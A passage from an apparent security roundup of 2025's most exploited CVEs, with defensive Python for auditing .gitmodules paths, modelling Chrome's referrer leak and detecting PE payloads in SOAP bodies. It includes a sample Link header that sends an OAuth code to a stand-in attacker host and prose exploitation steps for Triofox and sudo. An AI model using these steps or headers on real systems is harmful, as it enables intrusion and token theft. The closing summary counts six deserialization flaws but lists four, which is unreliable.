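SECTION_RE = re.compile(rb'^\s*\[submodule\s+"(?P<name>[^"]*)"\]\s*$')
KEY_RE = re.compile(rb'^\s*(?P<key>[A-Za-z][A-Za-z0-9-]*)\s*=\s*(?P<value>.*)$')


def parse_gitmodules(raw):
    """Return {submodule_name: {key: value_bytes}}. Only the CR that is part of a
    CRLF line ending is dropped; a CR anywhere else in the value is preserved."""
    modules, current = {}, None
    for line in raw.split(b"\n"):
        if line.endswith(b"\r"):
            line = line[:-1]
        section = SECTION_RE.match(line)
        if section:
            current = section.group("name").decode("utf-8", "replace")
            modules[current] = {}
            continue
        kv = KEY_RE.match(line)
        if kv and current is not None:
            modules[current][kv.group("key").decode().lower()] = kv.group("value").rstrip(b" \t")
    return modules


def unquote(value):
    if len(value) >= 2 and value[:1] == b'"' and value[-1:] == b'"':
        return value[1:-1]
    return value


def audit_submodule_path(value):
    """List of reasons a submodule path is unsafe to act on; empty if none."""
    path = unquote(value)
    parts = path.replace(b"\\", b"/").split(b"/")
    findings = []
    if b"\r" in path:
        findings.append("carriage return inside path")
    if path.startswith(b"/") or re.match(rb"^[A-Za-z]:", path):
        findings.append("absolute path")
    if b".." in parts:
        findings.append("parent-directory component")
    if b".git" in parts:
        findings.append("path enters .git")
    return findings


def audit_gitmodules(raw):
    """Map each submodule name to its findings (a missing path is itself a finding)."""
    report = {}
    for name, keys in parse_gitmodules(raw).items():
        report[name] = audit_submodule_path(keys["path"]) if "path" in keys else ["no path"]
    return report


# Constructed sample: the second submodule carries the quoted trailing CR.
SAMPLE_GITMODULES = (
    b'[submodule "vendor/lib"]\n'
    b'\tpath = vendor/lib\n'
    b'\turl = https://git.example.invalid/vendor/lib.git\n'
    b'[submodule "tooling"]\n'
    b'\tpath = "tooling\r"\n'
    b'\turl = https://git.example.invalid/tooling.git\n'
)


if __name__ == "__main__":
    for name, findings in audit_gitmodules(SAMPLE_GITMODULES).items():
        print(name, "->", findings or "ok")
```

Run it against the .gitmodules of an untrusted repository before git clone --recursive or git submodule update --init. With a CRLF-formatted file only the line-ending CR is stripped, so legitimately Windows-authored files are not flagged.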
CVE-2025-12480: Gladinet Triofox Improper Access Control
Gladinet Triofox, an on-premises and hybrid file-sharing platform widely used by managed service providers and enterprises, suffered from CVE-2025-12480, an improper access control vulnerability with a CVSS score of 9.1. Although Gladinet patched the flaw on July 26, 2025, in version 16.7.10368.56560, it was not publicly disclosed until November 12, 2025, when it was added to CISA’s KEV catalog after active exploitation was observed.
Mandiant Threat Defense found that the threat cluster UNC6485 exploited the flaw as early as August 24, 2025, nearly a month after the patch was released but before any public CVE disclosure. The vulnerability allows attackers to abuse the HTTP Host header check to reach the management/AdminDatabase.aspx setup workflow, create local administrative accounts without credentials, and then point the product’s anti-virus executable path at a malicious script.
The exploitation chain modified the Host header to bypass the access control, reaching AdminAccount.aspx, which redirects to InitAccount.aspx for creating new admin accounts. Once authenticated with the newly created admin account, the attackers uploaded malicious files and executed them through the built-in anti-virus feature; the configured anti-virus path inherits the privileges of the Triofox parent process and runs in the SYSTEM account context. Observed activity included deploying PLINK to tunnel RDP outbound and downloading files to staging directories such as C:\WINDOWS\Temp.
CVE-2025-32463: Sudo Privilege Escalation via Chroot
A critical vulnerability (CVSS 9.3) was found in Sudo versions 1.9.14 through 1.9.17, reported by Rich Mirch of the Stratascale Cyber Research Unit in June 2025. CVE-2025-32463 allows local users to obtain root access through the --chroot option, because /etc/nsswitch.conf is read from the user-controlled directory.
The vulnerability stems from a change introduced in sudo 1.9.14 that resolved paths via chroot() into the user-specified root directory while the sudoers policy was still being evaluated. An attacker can prepare a writable directory (for example under /tmp), place a fake /etc/nsswitch.conf and a malicious libnss_*.so library inside it, then invoke sudo with the --chroot option, causing sudo to load the attacker’s library with root privileges.
Major Linux distributions, including Ubuntu, Red Hat, SUSE, and Debian, issued security advisories and patches. The vulnerability was fixed in sudo version 1.9.17p1, which reverted the change from 1.9.14 and marked the chroot feature as deprecated. CISA added the vulnerability to its KEV catalog in October 2025, emphasizing its severity for enterprise Linux environments.
CVE-2025-4664: Chrome Cross-Origin Data Leak
Google Chrome was exploited via CVE-2025-4664, a high-severity vulnerability (CVSS 8.8) affecting versions prior to 136.0.7103.113, disclosed and patched on May 14, 2025. CISA added the vulnerability to its KEV catalog on May 15, 2025, with a remediation due date of June 5, 2025, confirming active exploitation.
The vulnerability stems from insufficient policy enforcement in Chrome’s Loader component, allowing remote attackers to leak cross-origin data through crafted HTML pages. The issue lies in how Chrome handled the Link HTTP header on sub-resource responses such as images and scripts, honoring its referrer-policy parameter even on sub-resources, behavior not shared by other major browsers. An attacker can use this header to set a looser policy such as unsafe-url, causing Chrome to send the full referrer URL, including any tokens or credentials in its query string, to a third-party domain.
Security researcher Vsevolod Kokorin (“slonser_”) noted that the Link header can set a referrer-policy of unsafe-url, capturing full query parameters that may contain sensitive data. In OAuth flows this can lead to account takeover, as developers rarely consider that query parameters could be stolen through an image loaded from a third-party resource. The vulnerability requires user interaction (opening a malicious HTML page), but that step is easy to achieve through phishing or a compromised website.
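A model of the referrer computation behind this leak, as an added example (not Chromium code). referrer_for() implements a subset of the W3C Referrer Policy algorithm, parse_link_header() reads a Link response header, and leaked_referer() reproduces the pre-fix behaviour described above, in which a referrerpolicy parameter on a third-party sub-resource’s Link header takes precedence over the document’s policy. The OAuth callback URL, the code value and the attacker host are constructed.

```python
"""Model of the Referer computation behind the CVE-2025-4664 leak. Added
example, not Chromium code: referrer_for() implements a subset of the W3C
Referrer Policy algorithm, parse_link_header() reads the Link response
header, and leaked_referer() reproduces the pre-fix behaviour in which a
referrerpolicy parameter on a third-party sub-resource's Link header
overrides the document's policy. URLs and the OAuth code are constructed."""
import re
from urllib.parse import urlsplit, urlunsplit


def origin(url):
    p = urlsplit(url)
    return "%s://%s" % (p.scheme, p.netloc)


def referrer_url(url):
    """A referrer never carries the fragment or userinfo."""
    p = urlsplit(url)
    host = p.hostname + (":%d" % p.port if p.port else "")
    return urlunsplit((p.scheme, host, p.path, p.query, ""))


def referrer_for(document_url, policy, target_url):
    """Referer value sent with a request to target_url made from document_url."""
    same_origin = origin(document_url) == origin(target_url)
    downgrade = urlsplit(document_url).scheme == "https" and urlsplit(target_url).scheme == "http"
    full, only_origin = referrer_url(document_url), origin(document_url) + "/"
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "origin":
        return only_origin
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "origin-when-cross-origin":
        return full if same_origin else only_origin
    if policy == "strict-origin":
        return None if downgrade else only_origin
    # strict-origin-when-cross-origin, the browser default
    if downgrade:
        return None
    return full if same_origin else only_origin


def parse_link_header(header):
    """[(url, {param: value}), ...] for one Link header (simplified RFC 8288;
    URLs containing commas are not handled)."""
    entries = []
    for part in header.split(","):
        m = re.match(r"\s*<([^>]+)>(.*)", part)
        if not m:
            continue
        params = {}
        for p in m.group(2).split(";")[1:]:
            if "=" in p:
                k, v = p.split("=", 1)
                params[k.strip().lower()] = v.strip().strip('"').lower()
        entries.append((m.group(1), params))
    return entries


def leaked_referer(document_url, document_policy, subresource_link_header):
    """(preload_url, referer) for the preload a Link header triggers, with the
    header's referrerpolicy taking precedence as in the vulnerable behaviour."""
    for url, params in parse_link_header(subresource_link_header):
        if params.get("rel") == "preload":
            policy = params.get("referrerpolicy", document_policy)
            return url, referrer_for(document_url, policy, url)
    return None


if __name__ == "__main__":
    doc = "https://app.example/oauth/callback?code=AUTHCODE123&state=xyz"
    link = '<https://cdn.attacker.example/beacon.png>; rel=preload; as=image; referrerpolicy=unsafe-url'
    print(referrer_for(doc, "strict-origin-when-cross-origin", "https://cdn.attacker.example/beacon.png"))
    print(leaked_referer(doc, "strict-origin-when-cross-origin", link))
```

Under the browser default the cross-origin preload receives only https://app.example/; with the header-injected unsafe-url it receives the full callback URL, code included. The application-side mitigation that survives the browser bug is to keep secrets out of the URL, or to consume and redirect away from the authorization code before any third-party sub-resource is loaded.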
CVE-2025-10585: Chrome V8 Type Confusion Zero-Day
Google released emergency security updates in September 2025 to address CVE-2025-10585, an actively exploited type confusion vulnerability in the V8 JavaScript and WebAssembly engine. Discovered and reported by Google’s Threat Analysis Group (TAG) on September 16, 2025, the vulnerability received a high-severity rating and was confirmed to be under active exploitation.
Type confusion occurs when the engine fails to verify the type of the object it is handling and operates on it as if it were another type, for example treating an array as a scalar value or a number as a string. The result is unpredictable behavior that lets an attacker manipulate memory and run code remotely through crafted JavaScript on a malicious or compromised website. The vulnerability affects Chrome versions prior to 140.0.7339.185/.186 on Windows and macOS and 140.0.7339.185 on Linux.
CVE-2025-10585 is the sixth Chrome zero-day publicly tied to active exploitation in 2025, after CVE-2025-2783, CVE-2025-4664, CVE-2025-5419, CVE-2025-6554, and CVE-2025-6558. Security researchers emphasized that type confusion bugs in V8 are particularly powerful: tricking the engine into misinterpreting memory layout lets attackers corrupt memory, crash the browser, or gain code execution on the host, all by getting a user to load a malicious page. Because proof-of-concept exploits were available, unpatched systems faced immediate risk from widespread exploitation attempts.
CVE-2025-5086: DELMIA Apriso Deserialization Crisis
Dassault Systèmes’ DELMIA Apriso manufacturing operations management platform suffered from CVE-2025-5086, a critical deserialization of untrusted data vulnerability with a CVSS score of 9.0. The vulnerability affects DELMIA Apriso versions from Release 2020 through Release 2025 and was patched on June 2, 2025, but unpatched systems were subsequently targeted in the wild.
CISA added the vulnerability to its KEV catalog on September 11, 2025, after the SANS Internet Storm Center reported observing real-world exploitation attempts on September 3, 2025. The vulnerability allows remote, unauthenticated attackers to execute arbitrary code through malicious SOAP/HTTP requests to vulnerable endpoints. Security researcher Johannes Ullrich observed attacks originating from IP address 156.244.33[.]162, with payloads consisting of Base64-encoded, GZIP-compressed .NET executables embedded within the XML.
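A detector for the payload shape described above, added as an example (not SANS ISC or Dassault code): it finds long Base64 runs in a SOAP body, decodes them, peels a gzip layer with a size cap so a decompression bomb cannot exhaust memory, and checks for a DOS header whose e_lfanew points at the PE signature. The SOAP envelope, its element names and the executable stand-in are constructed.

```python
"""Detector for a Base64 blob inside a SOAP/XML body that gunzips to a
Windows PE file. Added example, not SANS ISC or Dassault code: it finds long
Base64 runs, decodes them, peels a gzip layer with a size cap (so a
decompression bomb cannot exhaust memory), and checks for a DOS header whose
e_lfanew points at a 'PE\\0\\0' signature. The SOAP envelope and the
executable stand-in are constructed."""
import base64
import gzip
import re
import struct
import zlib

BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"
MAX_DECOMPRESSED = 32 * 1024 * 1024      # assumed cap for decompression


def looks_like_pe(data):
    """DOS 'MZ' header with e_lfanew (offset 0x3C) pointing at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def bounded_gunzip(blob, limit=MAX_DECOMPRESSED):
    """Decompress gzip data but refuse to expand past `limit` bytes."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    out = d.decompress(blob, limit)
    if d.unconsumed_tail:
        raise ValueError("decompressed size exceeds %d bytes" % limit)
    return out


def scan_xml_for_embedded_pe(xml_text):
    """List findings for every Base64 run that decodes (via optional gzip) to a PE."""
    findings = []
    for m in BASE64_RUN_RE.finditer(xml_text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue
        layers = ["base64"]
        if raw[:2] == GZIP_MAGIC:
            try:
                raw = bounded_gunzip(raw)
            except (zlib.error, ValueError):
                continue
            layers.append("gzip")
        if looks_like_pe(raw):
            findings.append({"offset": m.start(), "layers": layers, "size": len(raw)})
    return findings


def build_fake_pe():
    """Constructed stand-in for a .NET executable: MZ header, e_lfanew -> 'PE\\0\\0',
    followed by low-redundancy filler so the gzip layer stays non-trivial."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x80)
    return bytes(header) + b"PE\x00\x00" + bytes(range(256)) * 4


# Constructed SOAP body; element names are placeholders, not Apriso's schema.
SAMPLE_SOAP = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
    '<Import><Data>' + base64.b64encode(gzip.compress(build_fake_pe())).decode() + '</Data></Import>'
    '</soap:Body></soap:Envelope>'
)


if __name__ == "__main__":
    print(scan_xml_for_embedded_pe(SAMPLE_SOAP))
```

The same check works on a WAF or reverse-proxy request body in front of the application; the gzip cap matters because an attacker who knows the detector exists can otherwise inflate the payload until the inspection step itself fails.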
The malicious payload was identified as a Windows executable classified by researchers as “Trojan.MSIL.Zapchast.gen,” a program built for cyber espionage, including keylogging, screenshot capture, and enumerating running applications. DELMIA Apriso is used to digitalize and monitor manufacturing processes and is widely deployed in the automotive, aerospace, electronics, high-tech, and industrial machinery sectors, supporting functions such as production scheduling, quality management, resource allocation, and warehouse management. The exploitation therefore represents a significant threat to operational technology environments and manufacturing critical infrastructure.
CVE-2025-41244: VMware Privilege Escalation by State Actors
VMware Aria Operations and VMware Tools contained CVE-2025-41244, a local privilege escalation vulnerability with a CVSS score of 7.8 that was exploited by state-linked actors before public disclosure. The vulnerability was disclosed on September 29, 2025, but NVISO researchers confirmed that the Chinese state-sponsored threat actor UNC5174 had been quietly leveraging the flaw since at least mid-October 2024.
The vulnerability affects systems with VMware Tools installed and managed by Aria Operations with the Service Discovery Management Pack (SDMP) enabled, allowing a local user with non-administrative privileges to escalate to root on the same VM. The flaw lies in the service discovery feature, in the get_version function of the get-versions.sh shell script, which uses broad regular expressions that can match non-system binaries in user-writable directories, an untrusted search path weakness (CWE-426).
When successfully exploited, attackers gain elevated privileges and full control of the affected system. The vulnerability affects VMware Aria Operations versions prior to 8.18.5, VMware Cloud Foundation Operations versions prior to 9.0.1.0, and VMware Tools versions prior to 13.0.5.0, 13.0.5, and 12.5.4. Broadcom’s failure to disclose active exploitation at the time of the advisory drew criticism from the security community, with researchers pointing out that organizations were left unaware of the real-world threat level.
CVE-2025-53690: Sitecore Deserialization Attacks
Sitecore Experience Manager (XM) and Experience Platform (XP) faced significant exploitation through CVE-2025-53690, a deserialization of untrusted data vulnerability (CVSS 9.0) affecting versions through 9.0. Mandiant Threat Defense discovered active ViewState deserialization attacks leveraging a sample machine key that had been exposed in Sitecore deployment guides from 2017 and earlier.
The vulnerability affects customers who deployed any version of several Sitecore products using the sample key exposed in publicly accessible deployment guides, specifically Sitecore XP 9.0 and Active Directory 1.4 and earlier versions. Sitecore confirmed that updated deployments automatically generate unique machine keys and notified affected customers. The vulnerability enables attackers to inject and execute arbitrary code by exploiting insecure deserialization of untrusted data.
Initial compromise was achieved by exploiting the ViewState deserialization vulnerability on affected internet-facing Sitecore instances, resulting in remote code execution. A decrypted ViewState payload contained WEEPSTEEL malware designed for internal reconnaissance. Following successful exploitation, threat actors archived the root directory of the web application to obtain sensitive files such as web.config, and deployed the EARTHWORM network tunneling tool, the DWAGENT remote access tool, and the SHARPHOUND Active Directory reconnaissance tool. The attackers created local administrator accounts, dumped the SAM/SYSTEM registry hives to compromise cached administrator credentials, and enabled lateral movement via RDP.
The twenty most exploited vulnerabilities of 2025 demonstrate the evolving sophistication of threat actors and the persistent challenges organizations face in securing modern IT infrastructure. With an average CVSS score of 8.5 and multiple vulnerabilities reaching the maximum severity rating of 10.0, these flaws represent significant risks to enterprise security posture.
Several key trends emerge from this analysis. First, deserialization vulnerabilities continue to plague enterprise applications, accounting for six of the twenty most exploited flaws (CVE-2025-55182, CVE-2025-59287, CVE-2025-5086, CVE-2025-53690).
Second, privilege escalation vulnerabilities targeting operating system kernels and drivers remain attractive to attackers seeking to establish persistent access (CVE-2025-62221, CVE-2025-62215, CVE-2025-48572, CVE-2025-48633, CVE-2025-41244, CVE-2025-32463).
Third, network infrastructure devices, including firewalls, VPNs, and gateways, face persistent targeting by state-sponsored actors (CVE-2025-5777, CVE-2025-20333, CVE-2025-20362, CVE-2025-9242).
Organizations must adopt a multi-layered defense strategy, prioritizing several key actions. Rapid patching of systems exposed to the internet or handling untrusted data should be the highest priority, particularly for maximum-severity vulnerabilities like CVE-2025-55182 and CVE-2025-32433.
Implementing network segmentation to isolate critical systems and limit lateral movement opportunities is essential, especially for operational technology environments vulnerable to CVE-2025-5086 and CVE-2025-41244. Enhanced monitoring and logging to detect exploitation attempts, particularly deserialization attacks and privilege escalation behaviors, provides essential early warning capabilities.
Federal agencies must comply with CISA KEV catalog deadlines, with all twenty vulnerabilities either already added to the catalog or confirmed under active exploitation. Private sector organizations should treat KEV additions as urgent security priorities requiring accelerated patch deployment outside normal maintenance windows.
The rapid exploitation timelines observed in 2025, with proof-of-concept exploits appearing within hours of disclosure for CVE-2025-55182 and CVE-2025-48384, underscore the critical importance of proactive security postures and prepared incident response capabilities.
As the cybersecurity landscape continues to evolve, organizations must recognize that vulnerability management is not merely a technical challenge but a strategic imperative requiring executive attention, adequate resource allocation, and continuous vigilance.
The exploitation trends observed in 2025 will likely continue into 2026, with threat actors increasingly targeting supply chain dependencies, cloud infrastructure, and operational technology systems. Only through comprehensive defense-in-depth strategies, timely patching, and continuous monitoring can organizations hope to mitigate the risks posed by these critical vulnerabilities.
